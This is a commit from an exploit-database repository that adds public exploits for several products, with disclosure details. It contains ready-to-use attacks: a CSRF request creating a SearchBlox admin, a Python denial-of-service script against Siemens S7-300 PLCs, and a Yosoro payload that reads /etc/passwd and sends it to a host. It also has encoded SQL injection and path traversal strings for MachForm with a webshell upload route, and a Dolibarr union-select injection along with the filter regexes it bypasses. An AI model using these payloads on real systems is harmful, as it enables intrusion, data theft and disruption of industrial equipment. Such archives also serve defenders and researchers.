DB: 2018-05-31

6 changes to exploits/shellcodes

Siemens SIMATIC S7-300 CPU - Remote Denial of Service

Procps-ng - Multiple Vulnerabilities
SearchBlox 8.6.6 - Cross-Site Request Forgery
Yosoro 1.0.4 - Remote Code Execution
MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass
Dolibarr 7.0.0 - SQL Injection
This commit is contained in:
Offensive Security 2018-05-31 05:01:44 +00:00
parent 96e4f1686b
commit 89ee92def8
7 changed files with 2579 additions and 0 deletions

View file

@ -0,0 +1,48 @@
# Exploit Title: CSRF Privilege Escalation (Creation of an administrator
account) on SearchBlox 8.6.6
# Exploit Author: Canberk BOLAT, Ahmet GÜREL
# Software Link: https://www.searchblox.com/
# Version: < = SearchBlox Version 8.6.6
# Platform: Java
# Tested on: Windows
# CVE: CVE-2018-11538
# 1. DETAILS
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who
is currently authenticated with a web application to execute an unwanted
action. The attacker can trick the user into loading a page which may send
a request to perform the unwanted action in the background. In the case of
Searchblox, we can use CSRF to perform actions on the admin dashboard by
targeting an administrator.
# 2. PoC:
We assume that Searchblox is installed at http://localhost:8080/. Our
target is /searchblox/servlet/UserServlet u_name, u_passwd1, u_passwd2 and
role parameter which is the page used to create a new user. The given POC
will create a user on the website which has full administrator privileges.
HTTP Request:
GET
/searchblox/servlet/UserServlet?u_name=best1&u_passwd1=test&u_passwd2=test&role=admin&new-group=&menu1=adm&menu2=db&action=addBuisnessUser
HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/searchblox/admin/main.jsp?menu1=adm
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Cookie: JSESSIONID=touluja8tpjc1iiwquoyiigfi;
Connection: close
Upgrade-Insecure-Requests: 1
Attack Vector:
<img src="
http://target:8080/searchblox/servlet/UserServlet?u_name=best1&u_passwd1=test&u_passwd2=test&role=admin&new-group=&menu1=adm&menu2=db&action=addBuisnessUser"
width="0" height="0">

21
exploits/linux/dos/44802.py Executable file
View file

@ -0,0 +1,21 @@
# Exploit Title: Siemens SIMATIC S7-300 CPU - Remote Denial Of Service
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-30
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-300 CPU family: all versions.
# Tested on: Kali Linux
# CVE: CVE-2015-2177
#!/usr/bin/python
import socket
target_address="TargetIP"
target_port=80
buffer = "GET " + "\x42" * 2220 + " HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,17 @@
# Exploit title: Yosoro 1.0.4 - Remote Code Execution
# Date: 2018-05-29
# Exploit Author: Carlo Pelliccioni
# Vendor homepage: https://yosoro.coolecho.net/
# Software link: https://github.com/IceEnd/Yosoro/releases/download/v1.0.4/Yosoro-darwin-x64-1.0.4.zip
# Version: 1.0.4
# Tested on: MacOS 10.13.4
# CVE: CVE-2018-11522
# _ _ _ _ _ ___ _ _
# | || | __ _ __ | |__| |_ (_)__ __ ___ / __| ___ __ _ _ _ _ (_)| |_ _ _
# | __ |/ _` |/ _|| / /| _|| |\ V // -_) \__ \/ -_)/ _|| || || '_|| || _|| || |
# |_||_|\__,_|\__||_\_\ \__||_| \_/ \___| |___/\___|\__| \_,_||_| |_| \__| \_, |
# Remote Code Execution (CVE-2018-11522)
# Payload:
<webview src="data:text/html,<script>var read = require('fs').readFileSync('/etc/passwd', 'utf-8'); document.location='http://127.0.0.1:8089/'+btoa(read); </script>" nodeintegration></webview>

View file

@ -0,0 +1,105 @@
Vendor: Appnitro
Product webpage: https://www.machform.com/
Full-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/
Fix: https://www.machform.com/blog-machform-423-security-release/
Author: Amine Taouirsa
Twitter: @metalamin
Google dork examples:
----------------------
"machform" inurl:"view.php"
"machform" inurl:"embed.php"
Summary:
---------
The form creation platform MachForm from Appnitro is subject to SQL
injections that lead to path traversal and arbitrary file upload.
The application is widely deployed and with some google dorks its possible
to find various webpages storing sensitive data as credit card numbers with
corresponding security codes. Also, the arbitrary file upload can let an
attacker get control of the server by uploading a WebShell.
[1] SQL injection (CVE-2018-6410):
-------------------------
[1.1] Description:
The software is subject to SQL injections in the download.php file.
[1.2] Parameters and statement:
This SQLi can be found on the parameter q which a base64 encoded value
for the following parameters:
$form_id = $params['form_id'];
$id = $params['id'];
$field_name = $params['el'];
$file_hash = $params['hash'];
So the injectable parameters are el and form_id obtaining error-based,
stacked queries and time-based blind SQL injections. This is due to the
following vulnerable statement:
$query = "select {$field_name} from `".MF_TABLE_PREFIX."form_{$form_id}`
where id=?";
[1.3] POC
Proof of concept to get the first user mail:
http:// [URL] / [Machform_folder] /download.php?q=
ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgy
MDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3Vz
ZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1Io
UkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RF
Ul9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=
Which is the base64 encoding for:
el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT
MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT
0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
BY x)a) ;&id=1&hash=1&form_id=1
[2] Path traversal (CVE-2018-6409):
-----------------------------------
[2.1] Descrition
download.php is used to serve stored files from the forms answers.
Modifying the name of the file to serve on the corresponding ap_form table
leads to a path traversal vulnerability.
[2.2] POC
First we need to change the name for the element on the form:
update ap_form_58009 set element_4="../../../../../../.
./../../../../../../../../../etc/passwd" where id=1;
Now in order to be able to download it, we need to access:
http:// [URL] / [Machform_folder] /download.php?q=
ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0
NTgmZm9ybV9pZD01ODAwOQo=
Which is the base64 encoding for;
el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009
Note that hash is the MD5 of the corresponding filename:
md5("../../../../../../../../../../../../../../../../etc/passwd") =
402ba0230d6f44a2de590ac11107a458
[3] Bypass file upload filter (CVE-2018-6411):
----------------------------------------------
When the form is set to filter a blacklist, it automatically add dangerous
extensions to the filters.
If the filter is set to a whitelist, the dangerous extensions can be
bypassed.
This can be done directly on the database via SQLi
update ap_form_elements set element_file_type_list="php",
element_file_block_or_allow="a" where form_id=58009 and element_id=4;
Once uploaded the file can be found and executed in the following URL:
http:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]
The filename can be found in the database
SELECT element_4 FROM ap_form_58009 WHERE id=1;

View file

@ -0,0 +1,204 @@
# [CVE-2018-10094] Dolibarr SQL Injection vulnerability
## Description
Dolibarr is an "Open Source ERP & CRM for Business" used by many
companies worldwide.
It is available through [GitHub](https://github.com/Dolibarr/dolibarr)
or as distribution packages (e.g .deb package).
**Threat**
The application does not handle user input properly and allows execution
of arbitrary SQL commands on the database.
**Expectation**
Prepared queries should be used in order to avoid SQL injection in user
input.
## Vulnerability type
**CVE ID**: CVE-2018-10094
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-89
**CVSS Base Score**: 7.5
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
## Details
The database connector escapes quotes with the `real_escape_string()`
wrapper. However it is still possible to perform injection on integer
parameters without quotes.
```php
mysqli.class.php
/**
* Escape a string to insert data
*
* @param string $stringtoencode String to escape
* @return string String escaped
*/
function escape($stringtoencode)
{
return $this->db->real_escape_string($stringtoencode);
}
```
Additional checks are defined later, which forbit some SQL keywords (e.g
`union`, `create`, `insert`). However, by url encoding the payload,
these checks are bypassed.
```php
main.inc.php
/**
* Security: SQL Injection and XSS Injection (scripts) protection
(Filters on GET, POST, PHP_SELF).
*
* @param string $val Value
* @param string $type 1=GET, 0=POST, 2=PHP_SELF
* @return int >0 if there is an injection
*/
function test_sql_and_script_inject($val, $type)
{
$inj = 0;
// For SQL Injection (only GET are used to be included into bad
escaped SQL requests)
if ($type == 1)
{
$inj += preg_match('/updatexml\(/i', $val);
$inj += preg_match('/delete\s+from/i', $val);
$inj += preg_match('/create\s+table/i', $val);
$inj += preg_match('/insert\s+into/i', $val);
$inj += preg_match('/select\s+from/i', $val);
$inj += preg_match('/into\s+(outfile|dumpfile)/i', $val);
}
if ($type != 2) // Not common, we can check on POST
{
$inj += preg_match('/update.+set.+=/i', $val);
$inj += preg_match('/union.+select/i', $val);
$inj += preg_match('/(\.\.%2f)+/i', $val);
}
// For XSS Injection done by adding javascript with script
// This is all cases a browser consider text is javascript:
// When it found '<script', 'javascript:', '<style', 'onload\s=' on
body tag, '="&' on a tag size with old browsers
// All examples on page: http://ha.ckers.org/xss.html#XSScalc
// More on
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
$inj += preg_match('/<script/i', $val);
$inj += preg_match('/<iframe/i', $val);
$inj += preg_match('/Set\.constructor/i', $val); // ECMA script 6
if (! defined('NOSTYLECHECK')) $inj += preg_match('/<style/i', $val);
$inj += preg_match('/base[\s]+href/si', $val);
$inj += preg_match('/<.*onmouse/si', $val); // onmousexxx can
be set on img or any html tag like <img title='...' onmouseover=alert(1)>
$inj += preg_match('/onerror\s*=/i', $val); // onerror can be
set on img or any html tag like <img title='...' onerror = alert(1)>
$inj += preg_match('/onfocus\s*=/i', $val); // onfocus can be
set on input text html tag like <input type='text' value='...' onfocus =
alert(1)>
$inj += preg_match('/onload\s*=/i', $val); // onload can be
set on svg tag <svg/onload=alert(1)> or other tag like body <body
onload=alert(1)>
$inj += preg_match('/onclick\s*=/i', $val); // onclick can be
set on img text html tag like <img onclick = alert(1)>
$inj += preg_match('/onscroll\s*=/i', $val); // onscroll can be
on textarea
//$inj += preg_match('/on[A-Z][a-z]+\*=/', $val); // To lock event
handlers onAbort(), ...
$inj += preg_match('/&#58;|&#0000058|&#x3A/i', $val); //
refused string ':' encoded (no reason to have it encoded) to lock
'javascript:...'
//if ($type == 1)
//{
$inj += preg_match('/javascript:/i', $val);
$inj += preg_match('/vbscript:/i', $val);
//}
// For XSS Injection done by adding javascript closing html tags
like with onmousemove, etc... (closing a src or href tag with not
cleaned param)
if ($type == 1) $inj += preg_match('/"/i', $val); // We
refused " in GET parameters value
if ($type == 2) $inj += preg_match('/[;"]/', $val); // PHP_SELF
is a file system path. It can contains spaces.
return $inj;
}
```
## Proof of Concept : retrieving the database name.
Payload:
```
1) union select
0,1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
Url-encoded payload:
%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
```
```http
GET
/dolibarr/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
HTTP/1.1
Host: dolibarr.lab:2080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie:
DOLSESSID_cac4a1e49e4040e845340fe919bd202b=qh3ot46kvm95ph0ddd3ujd7je5
Connection: close
Upgrade-Insecure-Requests: 1
...
</a>
</td>
<td>10.1.26-MariaDB-0+deb9u1</td>
<td>2</td>
<td></td>
<td>1</td>
<td>21</td>
<td class="nowrap">
```
## Affected versions
* Version 7.0.0 (last stable version as of March 2018) - previous
versions are probably also vulnerable but not tested
## Solution
Update to 7.0.2
([changelog](https://raw.githubusercontent.com/Dolibarr/dolibarr/develop/ChangeLog))
## Timeline (dd/mm/yyyy)
* 18/03/2018 : Initial discovery
* 17/04/2018 : Contact with the editor
* 17/04/2018 : Editor acknowledges the vulnerability
* 18/04/2018 : Editor announces fixes in version 7.0.2
* 21/05/2018 : Vulnerability disclosure
## Credits
* Issam RABHI (i dot rabhi at sysdream dot com)
* Kevin LOCATI (k dot locati at sysdream dot com)
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream

View file

@ -5983,6 +5983,7 @@ id,file,description,date,author,type,platform,port
44758,exploits/windows/dos/44758.html,"Microsoft Edge Chakra - Cross Context Use-After-Free",2018-05-25,"Google Security Research",dos,windows,
44759,exploits/multiple/dos/44759.html,"Skia and Firefox - Integer Overflow in SkTDArray Leading to Out-of-Bounds Write",2018-05-25,"Google Security Research",dos,multiple,
44768,exploits/php/dos/44768.txt,"Symfony 2.7.0 < 4.0.10 - Denial of Service",2018-05-26,"Federico Stange",dos,php,
44802,exploits/linux/dos/44802.py,"Siemens SIMATIC S7-300 CPU - Remote Denial of Service",2018-05-30,t4rkd3vilz,dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9748,6 +9749,7 @@ id,file,description,date,author,type,platform,port
44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86,
44797,exploits/linux/local/44797.txt,"GNU Barcode 0.99 - Buffer Overflow",2018-05-29,LiquidWorm,local,linux,
44798,exploits/linux/local/44798.txt,"GNU Barcode 0.99 - Memory Leak",2018-05-29,LiquidWorm,local,linux,
44806,exploits/linux/local/44806.txt,"Procps-ng - Multiple Vulnerabilities",2018-05-30,"Qualys Corporation",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39470,3 +39472,7 @@ id,file,description,date,author,type,platform,port
44796,exploits/java/webapps/44796.txt,"Pivotal Spring Java Framework < 5.0 - Remote Code Execution",2018-05-29,JameelNabbo,webapps,java,
44799,exploits/php/webapps/44799.txt,"Facebook Clone Script 1.0.5 - 'search' SQL Injection",2018-05-29,L0RD,webapps,php,
44800,exploits/php/webapps/44800.txt,"Facebook Clone Script 1.0.5 - Cross-Site Request Forgery",2018-05-29,L0RD,webapps,php,
44801,exploits/java/webapps/44801.txt,"SearchBlox 8.6.6 - Cross-Site Request Forgery",2018-05-30,"Ahmet Gurel",webapps,java,
44803,exploits/macos/webapps/44803.txt,"Yosoro 1.0.4 - Remote Code Execution",2018-05-30,"Carlo Pelliccioni",webapps,macos,
44804,exploits/php/webapps/44804.txt,"MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass",2018-05-30,"Amine Taouirsa",webapps,php,80
44805,exploits/php/webapps/44805.txt,"Dolibarr 7.0.0 - SQL Injection",2018-05-30,Sysdream,webapps,php,80

Can't render this file because it is too large.